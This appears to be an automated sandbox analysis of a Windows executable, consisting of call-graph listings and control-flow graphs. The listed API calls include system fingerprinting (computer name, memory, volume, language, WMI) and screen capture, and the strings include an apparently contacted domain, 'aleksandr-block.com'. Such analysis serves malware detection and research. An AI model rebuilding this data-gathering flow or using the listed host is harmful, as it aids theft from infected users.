14396 43e8a0 14357->14396 14358->14341 14432 4402d0 LdrInitializeThunk 14358->14432 14359->14341 14359->14343 14359->14345 14359->14354 14359->14355 14359->14356 14359->14357 14359->14358 14359->14362 14363 4402d0 LdrInitializeThunk 14359->14363 14374 43c410 14359->14374 14362->14341 14362->14345 14362->14354 14362->14355 14362->14356 14362->14358 14410 43ec70 14362->14410 14363->14359 14364->14359 14373 4402d0 LdrInitializeThunk 14364->14373 14371 443250 14369->14371 14370 44333e 14370->14340 14371->14370 14433 4402d0 LdrInitializeThunk 14371->14433 14373->14359 14376 43c420 14374->14376 14379 43c4e2 14376->14379 14434 440260 14376->14434 14443 4402d0 LdrInitializeThunk 14376->14443 14378 43c7ab 14380 43e860 RtlFreeHeap 14378->14380 14379->14378 14381 43eb00 LdrInitializeThunk 14379->14381 14382 43c7c3 14380->14382 14388 43c528 14381->14388 14382->14359 14383 43c7af 14384 43ec10 LdrInitializeThunk 14383->14384 14384->14378 14385 4402d0 LdrInitializeThunk 14385->14388 14386 440260 3 API calls 14386->14388 14387 43e860 RtlFreeHeap 14387->14388 14388->14383 14388->14385 14388->14386 14388->14387 14389 43c7d0 14388->14389 14390 43e860 RtlFreeHeap 14389->14390 14390->14383 14392 43e873 14391->14392 14393 414603 14391->14393 14394 43e878 RtlFreeHeap 14392->14394 14393->14357 14395 4402d0 LdrInitializeThunk 14393->14395 14394->14393 14395->14357 14397 43e8c2 14396->14397 14398 43e8de 14396->14398 14397->14398 14444 4402d0 LdrInitializeThunk 14397->14444 14399 414718 14398->14399 14401 43e840 RtlAllocateHeap 14398->14401 14406 43eb00 14399->14406 14403 43e9a9 14401->14403 14402 43e860 RtlFreeHeap 14402->14399 14405 43e9de 14403->14405 14445 4402d0 LdrInitializeThunk 14403->14445 14405->14402 14407 43eb7e 14406->14407 14408 43eb0d 14406->14408 14407->14362 14408->14407 14446 4402d0 LdrInitializeThunk 14408->14446 14411 43ecae 14410->14411 14412 43ec82 14410->14412 14411->14345 14412->14411 14447 4402d0 LdrInitializeThunk 14412->14447 14414 43ed7e 14414->14411 14449 4402d0 LdrInitializeThunk 14414->14449 14415 43ed1e 14415->14414 14448 4402d0 LdrInitializeThunk 14415->14448 14419 43ec3e 14418->14419 14420 43ec16 14418->14420 14419->14355 14420->14419 14450 4402d0 LdrInitializeThunk 14420->14450 14423 44352e 14422->14423 14424 44350e 14422->14424 14423->14356 14424->14423 14451 4402d0 LdrInitializeThunk 14424->14451 14427 443599 14426->14427 14428 4435bf 14426->14428 14427->14428 14452 4402d0 LdrInitializeThunk 14427->14452 14428->14358 14430 4435e8 14430->14428 14453 4402d0 LdrInitializeThunk 14430->14453 14432->14341 14433->14370 14435 4402a5 14434->14435 14436 440286 14434->14436 14437 440278 14434->14437 14438 44029a 14434->14438 14442 4402a0 14434->14442 14440 43e860 RtlFreeHeap 14435->14440 14441 44028b RtlReAllocateHeap 14436->14441 14437->14435 14437->14436 14437->14442 14439 43e840 RtlAllocateHeap 14438->14439 14439->14442 14440->14442 14441->14442 14442->14376 14443->14376 14444->14398 14445->14405 14446->14407 14447->14415 14448->14414 14449->14411 14450->14419 14451->14423 14452->14430 14453->14428 14454 423e44 14455 423e4b 14454->14455 14456 423e5b RtlExpandEnvironmentStrings 14455->14456 14457 423e7c 14456->14457 14457->14457 14458 443390 LdrInitializeThunk 14457->14458 14459 423f71 14458->14459 14461 423f84 14459->14461 14463 424241 14459->14463 14465 420440 14459->14465 14462 443390 LdrInitializeThunk 14461->14462 14462->14463 14463->14463 14464 443390 LdrInitializeThunk 14463->14464 14464->14463 14466 443230 LdrInitializeThunk 14465->14466 14468 420480 14466->14468 14467 420a26 14467->14461 14468->14467 14469 43e840 RtlAllocateHeap 14468->14469 14470 4204e2 14469->14470 14478 4204f9 14470->14478 14480 4402d0 LdrInitializeThunk 14470->14480 14472 43e860 RtlFreeHeap 14473 420a18 14472->14473 14473->14467 14482 4402d0 LdrInitializeThunk 14473->14482 14474 43e840 RtlAllocateHeap 14474->14478 14476 420a08 14476->14472 14478->14474 14478->14476 14479 43e860 RtlFreeHeap 14478->14479 14481 4402d0 LdrInitializeThunk 14478->14481 14479->14478 14480->14470 14481->14478 14482->14473 14483 432d44 14484 432d4b VariantInit 14483->14484 14485 432cd8 14483->14485 14486 432ddf 14484->14486 14487 410446 14488 410463 14487->14488 14489 4107fe RtlExpandEnvironmentStrings 14488->14489 14490 40e863 14488->14490 14489->14490 14491 42f3c5 14492 42f3d5 14491->14492 14493 42f4eb GetComputerNameExA 14492->14493 14494 440a0d 14495 440a17 14494->14495 14498 440afe 14495->14498 14501 4402d0 LdrInitializeThunk 14495->14501 14497 440c1e 14498->14497 14500 4402d0 LdrInitializeThunk 14498->14500 14500->14497 14501->14498 14502 432648 CoSetProxyBlanket 14503 417451 14511 41745a 14503->14511 14505 417671 14512 4171a0 14505->14512 14552 4402d0 LdrInitializeThunk 14505->14552 14506 417416 14508 4173bd 14509 41aa90 4 API calls 14508->14509 14509->14506 14510 4402d0 LdrInitializeThunk 14510->14511 14511->14505 14511->14506 14511->14510 14511->14512 14514 418690 14511->14514 14512->14506 14512->14508 14513 443390 LdrInitializeThunk 14512->14513 14513->14512 14515 4186b3 14514->14515 14517 4186ce 14514->14517 14515->14517 14553 4402d0 LdrInitializeThunk 14515->14553 14518 41874e 14517->14518 14554 4402d0 LdrInitializeThunk 14517->14554 14519 4187ae 14518->14519 14544 418aa2 14518->14544 14555 4402d0 LdrInitializeThunk 14518->14555 14521 43e840 RtlAllocateHeap 14519->14521 14530 418899 14519->14530 14525 418809 14521->14525 14523 41883e 14524 43e860 RtlFreeHeap 14523->14524 14524->14530 14525->14523 14556 4402d0 LdrInitializeThunk 14525->14556 14528 418b15 FreeLibrary 14529 418a6d 14528->14529 14528->14544 14529->14544 14558 4402d0 LdrInitializeThunk 14529->14558 14530->14528 14530->14529 14531 418a68 14530->14531 14530->14544 14557 4402d0 LdrInitializeThunk 14530->14557 14531->14528 14533 418acc 14533->14528 14534 418ad3 FreeLibrary 14533->14534 14535 418b7c 14534->14535 14536 418aea 14534->14536 14535->14535 14538 43e840 RtlAllocateHeap 14535->14538 14535->14544 14539 418b08 14536->14539 14559 4402d0 LdrInitializeThunk 14536->14559 14543 418c60 14538->14543 14539->14535 14560 4402d0 LdrInitializeThunk 14539->14560 14541 418c8f 14542 43e860 RtlFreeHeap 14541->14542 14542->14544 14543->14541 14561 4402d0 LdrInitializeThunk 14543->14561 14544->14511 14546 43eb00 LdrInitializeThunk 14550 418cb8 14546->14550 14547 43ec10 LdrInitializeThunk 14547->14550 14548 43e860 RtlFreeHeap 14548->14550 14549 4402d0 LdrInitializeThunk 14549->14550 14550->14541 14550->14546 14550->14547 14550->14548 14550->14549 14551 43e840 RtlAllocateHeap 14550->14551 14551->14550 14552->14512 14553->14517 14554->14518 14555->14519 14556->14523 14557->14533 14558->14544 14559->14539 14560->14535 14561->14550 14562 4408d4 14563 4408f0 14562->14563 14563->14563 14564 44097e 14563->14564 14566 4402d0 LdrInitializeThunk 14563->14566 14566->14564 14567 40d690 14572 436590 14567->14572 14569 40d696 14570 40d6a0 CoUninitialize 14569->14570 14571 40d6c0 14570->14571 14573 4365be GetSystemMetrics GetSystemMetrics 14572->14573 14574 4365fb DeleteObject 14573->14574 14576 436648 SelectObject 14574->14576 14578 4366c0 SelectObject 14576->14578 14579 4366dd DeleteObject 14578->14579 14581 42ecd0 14582 42ecda 14581->14582 14582->14582 14583 42eda9 GetPhysicallyInstalledSystemMemory 14582->14583 14584 42edd0 14583->14584 14585 42f596 14586 42f5ac GetComputerNameExA 14585->14586 14588 40d51b 14590 40d527 14588->14590 14591 40d544 14588->14591 14589 40d58e 14610 423d10 14589->14610 14590->14591 14614 4402d0 LdrInitializeThunk 14590->14614 14591->14589 14615 4402d0 LdrInitializeThunk 14591->14615 14595 40d5c6 14596 4245c0 6 API calls 14595->14596 14597 40d5e2 14596->14597 14598 424830 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14597->14598 14599 40d5fe 14598->14599 14600 4270d0 LdrInitializeThunk 14599->14600 14601 40d61a 14600->14601 14602 427a50 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14601->14602 14603 40d623 14602->14603 14604 427eb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14603->14604 14605 40d62c 14604->14605 14606 42a810 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14605->14606 14607 40d635 14606->14607 14608 4363e0 6 API calls 14607->14608 14609 40d676 14608->14609 14611 423d70 14610->14611 14611->14611 14612 423da4 RtlExpandEnvironmentStrings 14611->14612 14613 423df0 14612->14613 14613->14613 14614->14591 14615->14589 14616 40ae60 14617 40aef0 14616->14617 14617->14617 14618 40af15 14617->14618 14619 440260 3 API calls 14617->14619 14619->14617 14620 42d420 14622 42d450 14620->14622 14621 42d4fe 14622->14621 14624 4402d0 LdrInitializeThunk 14622->14624 14624->14621 14625 442460 14626 442480 14625->14626 14627 442565 14626->14627 14635 4402d0 LdrInitializeThunk 14626->14635 14628 43e840 RtlAllocateHeap 14627->14628 14632 44273f 14627->14632 14630 4425e5 14628->14630 14630->14630 14634 44267a 14630->14634 14636 4402d0 LdrInitializeThunk 14630->14636 14631 43e860 RtlFreeHeap 14631->14632 14634->14631 14635->14627 14636->14634 14637 442de0 14638 442def 14637->14638 14639 442f0f 14638->14639 14647 4402d0 LdrInitializeThunk 14638->14647 14641 43e840 RtlAllocateHeap 14639->14641 14644 4430b9 14639->14644 14642 442f76 14641->14642 14646 442fee 14642->14646 14648 4402d0 LdrInitializeThunk 14642->14648 14643 43e860 RtlFreeHeap 14643->14644 14646->14643 14647->14639 14648->14646 14649 40c9a6 CoInitializeEx CoInitializeEx 14650 4406a2 GetForegroundWindow 14654 4421b0 14650->14654 14652 4406ae GetForegroundWindow 14653 4406bd 14652->14653 14655 4421c6 14654->14655 14655->14652 14656 4358ef 14659 413e40 14656->14659 14658 4358f4 CoSetProxyBlanket 14659->14658 14660 4406f4 14661 44073e 14660->14661 14662 440715 14660->14662 14662->14661 14664 4402d0 LdrInitializeThunk 14662->14664 14664->14661 14665 43b5b0 14668 43b5d5 14665->14668 14666 43b60d 14670 43b747 14666->14670 14671 43b69f 14666->14671 14673 4402d0 LdrInitializeThunk 14666->14673 14668->14666 14674 4402d0 LdrInitializeThunk 14668->14674 14671->14670 14675 4402d0 LdrInitializeThunk 14671->14675 14673->14666 14674->14668 14675->14671 14676 43aa74 14677 43aa8c 14676->14677 14678 43aaaf GetUserDefaultUILanguage 14677->14678 14679 43aad6 14678->14679 14680 440e39 14681 440e5d 14680->14681 14682 440d73 14680->14682 14684 440dae 14682->14684 14685 4402d0 LdrInitializeThunk 14682->14685 14685->14684

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 43b7b0-43b7d5 1 43b7e0-43b816 0->1 1->1 2 43b818-43b82e 1->2 3 43b830-43b84a 2->3 3->3 4 43b84c-43b88f 3->4 5 43b890-43b8c3 4->5 5->5 6 43b8c5-43b8df 5->6 8 43b9b0-43b9b8 6->8 9 43b8e5-43b8ef 6->9 10 43b9c0-43b9d7 8->10 11 43b8f0-43b938 9->11 10->10 12 43b9d9-43ba2f 10->12 11->11 13 43b93a-43b94b 11->13 15 43ba30-43ba63 12->15 14 43b950-43b9a1 13->14 14->14 16 43b9a3-43b9ac 14->16 15->15 17 43ba65-43bab1 15->17 16->8 18 43bac0-43bb09 17->18 18->18 19 43bb0b-43bb5f CoCreateInstance 18->19 20 43bb65-43bb95 19->20 21 43c09e-43c0ca call 441c60 GetVolumeInformationW 19->21 23 43bba0-43bbdd 20->23 26 43c0d3-43c0d5 21->26 27 43c0cc-43c0cf 21->27 23->23 25 43bbdf-43bc08 SysAllocString 23->25 32 43bc0e-43bc28 CoSetProxyBlanket 25->32 33 43c08d-43c09a SysFreeString 25->33 28 43c0ed-43c0f4 26->28 27->26 30 43c100-43c119 28->30 31 43c0f6-43c0fd 28->31 34 43c120-43c138 30->34 31->30 35 43c083-43c089 32->35 36 43bc2e-43bc43 32->36 33->21 34->34 38 43c13a-43c16f 34->38 35->33 37 43bc50-43bc62 36->37 37->37 39 43bc64-43bce1 SysAllocString 37->39 40 43c170-43c1a6 38->40 41 43bcf0-43bd1a 39->41 40->40 42 43c1a8-43c1d7 call 41c7d0 40->42 41->41 43 43bd1c-43bd43 SysAllocString 41->43 46 43c1e0-43c1e8 42->46 49 43bd49-43bd6b 43->49 50 43c06d-43c07f SysFreeString * 2 43->50 46->46 48 43c1ea-43c1ec 46->48 51 43c1f2-43c202 call 408120 48->51 52 43c0e0-43c0e7 48->52 57 43c063-43c069 49->57 58 43bd71-43bd74 49->58 50->35 51->52 52->28 54 43c207-43c20e 52->54 57->50 58->57 59 43bd7a-43bd7f 58->59 59->57 60 43bd85-43bdcf VariantInit 59->60 61 43bdd0-43be02 60->61 61->61 62 43be04-43be19 61->62 63 43be1d-43be1f 62->63 64 43c052-43c05f VariantClear 63->64 65 43be25-43be2e 63->65 64->57 65->64 66 43be34-43be41 65->66 67 43be43-43be4a 66->67 68 43be87-43be89 66->68 69 43be66-43be6a 67->69 70 43be8b-43bea5 call 407f80 68->70 71 43be50-43be58 69->71 72 43be6c-43be75 69->72 79 43beab-43beb7 70->79 80 43c00a-43c021 70->80 74 43be5b-43be64 71->74 75 43be77-43be7a 72->75 76 43be7c-43be80 72->76 74->69 74->70 75->74 76->74 78 43be82-43be85 76->78 78->74 79->80 83 43bebd-43bec5 79->83 81 43c023-43c02d 80->81 82 43c042-43c04b call 407f90 80->82 81->82 85 43c02f-43c039 81->85 82->64 84 43bed0-43beda 83->84 87 43bef0-43bef6 84->87 88 43bedc-43bee1 84->88 85->82 89 43c03b-43c03e 85->89 92 43bf18-43bf28 87->92 93 43bef8-43befb 87->93 91 43bfa0-43bfaa 88->91 89->82 97 43bfac-43bfb2 91->97 95 43bfbe-43bfc7 92->95 96 43bf2e-43bf31 92->96 93->92 94 43befd-43bf13 93->94 94->91 100 43bfd1-43bfd4 95->100 101 43bfc9-43bfcf 95->101 96->95 98 43bf37-43bf9a 96->98 97->80 99 43bfb4-43bfb6 97->99 98->91 99->84 102 43bfbc 99->102 103 43c006-43c008 100->103 104 43bfd6-43c004 100->104 101->97 102->80 103->91 104->91
                                                    APIs
                                                    • CoCreateInstance.OLE32(7F7E7D64,00000000,00000001,D3D2D1DD,00000000,?,D3D2D1DD,?,?,?), ref: 0043BB57
                                                    • SysAllocString.OLEAUT32 ref: 0043BBE2
                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,D3D2D1DD,?,?,?), ref: 0043BC20
                                                    • SysAllocString.OLEAUT32 ref: 0043BC67
                                                    • SysAllocString.OLEAUT32 ref: 0043BD1F
                                                    • VariantInit.OLEAUT32(?), ref: 0043BD8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                    • String ID: ./$qn
                                                    • API String ID: 65563702-3823645636
                                                    • Opcode ID: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                    • Instruction ID: 2f0884b81ea7a4518840af457542ae1764f48caff3a768fe7da6a1d928f758ff
                                                    • Opcode Fuzzy Hash: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                    • Instruction Fuzzy Hash: 1F52E172A083508FD718CF28C89176BBBE2EFC9310F14992EE6D59B391D7759805CB86

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 105 423e44-423e49 106 423e52 105->106 107 423e4b-423e50 105->107 108 423e55-423e75 call 407f80 RtlExpandEnvironmentStrings 106->108 107->108 111 423e84-423e8c 108->111 112 423e7c 108->112 113 423e95 111->113 114 423e8e-423e93 111->114 112->111 115 423e9c-423ed9 call 407f80 113->115 114->115 118 423ee0-423f06 115->118 118->118 119 423f08-423f10 118->119 120 423f12-423f17 119->120 121 423f31-423f3e 119->121 122 423f20-423f2f 120->122 123 423f40-423f44 121->123 124 423f61-423f7d call 443390 121->124 122->121 122->122 125 423f50-423f5f 123->125 128 423fb6-424067 124->128 129 423f94 124->129 130 423f84-423f8b 124->130 131 424269-424271 124->131 132 423f9e-423fa6 124->132 125->124 125->125 135 424070-4240a2 128->135 129->132 130->129 136 424273-424278 131->136 137 424280 131->137 133 4240ca 132->133 134 423fac-423fb1 132->134 138 4240d1-42417a call 407f80 133->138 134->138 135->135 139 4240a4-4240b8 call 420440 135->139 140 424287-424337 call 407f80 136->140 137->140 148 424180-4241cd 138->148 144 4240bd-4240c2 139->144 147 424340-42438c 140->147 144->133 147->147 149 42438e-4243a2 147->149 148->148 150 4241cf-4241df 148->150 151 4243c1-4243d2 149->151 152 4243a4-4243a6 149->152 153 424201-42420e 150->153 154 4241e1-4241e6 150->154 158 424250-424260 call 443390 151->158 159 4243d8-4243df 151->159 157 4243b0-4243bf 152->157 155 424210-424214 153->155 156 424231-424244 call 443390 153->156 160 4241f0-4241ff 154->160 161 424220-42422f 155->161 156->131 157->151 157->157 158->131 163 4243e0-4243ef 159->163 160->153 160->160 161->156 161->161 163->163 166 4243f1 163->166 166->158
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                    • API String ID: 237503144-2105826625
                                                    • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                    • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                    • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                    • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: Object$DeleteMetricsSelectSystem
                                                    • String ID: $AnC$phC
                                                    • API String ID: 3911056724-4014303587
                                                    • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                    • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                    • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                    • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 181 408740-408751 call 43f980 184 408a02-408a04 ExitProcess 181->184 185 408757-40875e call 438b80 181->185 188 408764-408788 GetCurrentProcessId GetCurrentThreadId 185->188 189 4089fd call 440240 185->189 191 40878a-40878c 188->191 192 40878e-408852 SHGetSpecialFolderPathW GetForegroundWindow 188->192 189->184 191->192 193 408858-4088dd 192->193 194 4088df-408904 192->194 193->194 195 408910-40894f 194->195 195->195 196 408951-40898f call 43e840 195->196 199 408990-4089ac 196->199 200 4089c6-4089df call 409a60 199->200 201 4089ae-4089c4 199->201 204 4089e1 call 40c980 200->204 205 4089eb-4089f2 200->205 201->199 208 4089e6 call 40b5d0 204->208 205->189 207 4089f4-4089fa call 407f90 205->207 207->189 208->205
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                    • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                    • GetForegroundWindow.USER32 ref: 0040884A
                                                    • ExitProcess.KERNEL32 ref: 00408A04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                    • String ID: b/7
                                                    • API String ID: 4063528623-2085417233
                                                    • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                    • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                    • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                    • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 212 40d690-40d6bf call 436590 call 4095a0 CoUninitialize 217 40d6c0-40d6fb 212->217 217->217 218 40d6fd-40d712 217->218 219 40d720-40d745 218->219 219->219 220 40d747-40d789 219->220 221 40d790-40d7c6 220->221 221->221 222 40d7c8-40d7d2 221->222 223 40d7d4-40d7d7 222->223 224 40d7eb-40d7f8 222->224 227 40d7e0-40d7e9 223->227 225 40d7fa-40d7ff 224->225 226 40d80d 224->226 228 40d800-40d809 225->228 229 40d810-40d81b 226->229 227->224 227->227 228->228 230 40d80b 228->230 231 40d82b-40d835 229->231 232 40d81d-40d81f 229->232 230->229 234 40d837-40d838 231->234 235 40d84b-40d853 231->235 233 40d820-40d829 232->233 233->231 233->233 236 40d840-40d849 234->236 237 40d855-40d856 235->237 238 40d86b-40d877 235->238 236->235 236->236 239 40d860-40d869 237->239 240 40d891-40d946 238->240 241 40d879-40d87b 238->241 239->238 239->239 243 40d950-40d960 240->243 242 40d880-40d88d 241->242 242->242 244 40d88f 242->244 243->243 245 40d962-40d982 243->245 244->240 246 40d990-40d9d5 245->246 246->246 247 40d9d7-40d9f4 call 40b600 246->247 249 40d9f9-40da26 247->249
                                                    APIs
                                                      • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                      • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                      • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                      • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                      • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                      • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                    • CoUninitialize.COMBASE ref: 0040D6A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                    • String ID: ;d$SD$TC03$^_/C$aleksandr-block.com
                                                    • API String ID: 1556769885-2203050157
                                                    • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                    • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                    • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                    • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 420440-420485 call 443230 253 420a77-420a87 250->253 254 42048b-4204ea call 413e20 call 43e840 250->254 259 4204ec-4204f7 254->259 260 4204f9 259->260 261 4204fe-420513 259->261 264 4205b1-4205b9 260->264 262 420515 261->262 263 42051a-420526 261->263 265 4205a2-4205a5 262->265 263->265 266 420528-420598 call 4402d0 263->266 267 4205bb 264->267 268 4205bd-4205c2 264->268 270 4205a7 265->270 271 4205a9-4205ac 265->271 274 42059d 266->274 267->268 272 4205c8-4205d8 268->272 273 420a0c-420a1c call 43e860 268->273 270->264 271->259 275 4205da-4205f7 272->275 282 420a1e-420a24 273->282 274->265 277 4207bd 275->277 278 4205fd-42061b 275->278 280 4207c1-4207c4 277->280 281 420622-420625 278->281 283 4207c6-4207ca 280->283 284 4207cc-4207e2 call 43e840 280->284 285 420663-420681 call 420a90 281->285 286 420627-420661 281->286 287 420a26 282->287 288 420a28-420a3c 282->288 292 4207fa-420801 283->292 306 4207e6-4207f1 284->306 307 4207e4-4207f8 284->307 285->277 302 420687-4206ad 285->302 286->281 287->253 290 420a40-420a47 288->290 291 420a3e 288->291 297 420a67-420a6a 290->297 298 420a49-420a62 call 4402d0 290->298 291->297 294 420803 292->294 295 420808-420824 292->295 300 4209dd-4209e8 294->300 301 420826-420829 295->301 304 420a70-420a75 297->304 305 420a6c-420a6e 297->305 298->297 310 4209ea-4209fa 300->310 311 4209ec-4209f4 300->311 308 420842-42085c 301->308 309 42082b-420840 301->309 312 4206af-4206b2 302->312 304->282 305->253 314 4209fe-420a02 306->314 307->292 315 42085e-420869 308->315 309->301 319 4209fc 310->319 311->319 317 4206e3-4206ff call 420a90 312->317 318 4206b4-4206e1 312->318 314->275 320 420a08-420a0a 314->320 321 420870-420889 315->321 322 42086b 315->322 332 420701-420705 317->332 333 42070a-420721 317->333 318->312 319->314 320->273 326 420890-42089c 321->326 327 42088b 321->327 325 420933-42093f 322->325 329 420943-420962 325->329 330 420941 325->330 331 420922-420927 326->331 334 4208a2-420918 call 4402d0 326->334 327->331 335 420964-420967 329->335 330->329 339 42092b-42092e 331->339 340 420929 331->340 332->280 336 420723 333->336 337 420725-4207bb call 407f80 call 413a60 call 407f90 333->337 343 42091d 334->343 341 420980-420986 335->341 342 420969-42097e 335->342 336->337 337->280 339->315 340->325 345 4209b6-4209b9 341->345 346 420988-42098c 341->346 342->335 343->331 349 4209ca-4209cc 345->349 350 4209bb-4209c8 call 43e860 345->350 348 42098e-420995 346->348 354 420997-4209a3 348->354 355 4209a5-4209a8 348->355 353 4209ce-4209d1 349->353 350->353 353->300 357 4209d3-4209db 353->357 354->348 358 4209b2-4209b4 355->358 359 4209aa-4209b0 355->359 357->314 358->345 359->358
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: !@$,$y$}$~
                                                    • API String ID: 1279760036-3044378546
                                                    • Opcode ID: 554deacf8bc337da0981443a9ba3dfb598271926dd3bb08e90b684b7f9f9011f
                                                    • Instruction ID: 2852e8a72792478206081eee7b36556700343e18317fd051797439900b6cc18e
                                                    • Opcode Fuzzy Hash: 554deacf8bc337da0981443a9ba3dfb598271926dd3bb08e90b684b7f9f9011f
                                                    • Instruction Fuzzy Hash: 20029C7160C3508FD3249F29D48436FBBE1AB85314F948A2EE1D6873D2D7B99885CB4B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 365 42dee5-42deff 366 42df00-42df6a 365->366 366->366 367 42df6c-42df74 366->367 368 42df76-42df7f 367->368 369 42df8d-42df93 367->369 370 42df80-42df89 368->370 371 42df95-42ed01 369->371 370->370 372 42df8b 370->372 374 42ed10-42ed3d 371->374 372->371 374->374 375 42ed3f-42ed44 374->375 376 42ed46-42ed49 375->376 377 42ed5d 375->377 378 42ed50-42ed59 376->378 379 42ed5f-42ed6b 377->379 378->378 380 42ed5b 378->380 381 42ed81-42eda4 call 441c60 379->381 382 42ed6d-42ed6f 379->382 380->379 386 42eda9-42edc6 GetPhysicallyInstalledSystemMemory 381->386 383 42ed70-42ed7d 382->383 383->383 385 42ed7f 383->385 385->381 387 42edd0-42edf7 386->387 387->387 388 42edf9-42ee2e call 41c7d0 387->388 391 42ee30-42ee85 388->391 391->391 392 42ee87-42ee8f 391->392 393 42ee91-42ee97 392->393 394 42eead-42eeaf 392->394 395 42eea0-42eea9 393->395 396 42eeb2-42eebf 394->396 395->395 397 42eeab 395->397 398 42eec1-42eec2 396->398 399 42eedb-42eee5 396->399 397->396 400 42eed0-42eed9 398->400 401 42eee7-42eee8 399->401 402 42eefb-42ef3f 399->402 400->399 400->400 403 42eef0-42eef9 401->403 404 42ef40-42ef85 402->404 403->402 403->403 404->404 405 42ef87-42ef8c 404->405 406 42ef8e-42ef94 405->406 407 42efad-42efb0 405->407 408 42efa0-42efa9 406->408 409 42efb2-42efba 407->409 408->408 412 42efab 408->412 410 42efcb-42f08e 409->410 411 42efbc-42efbf 409->411 413 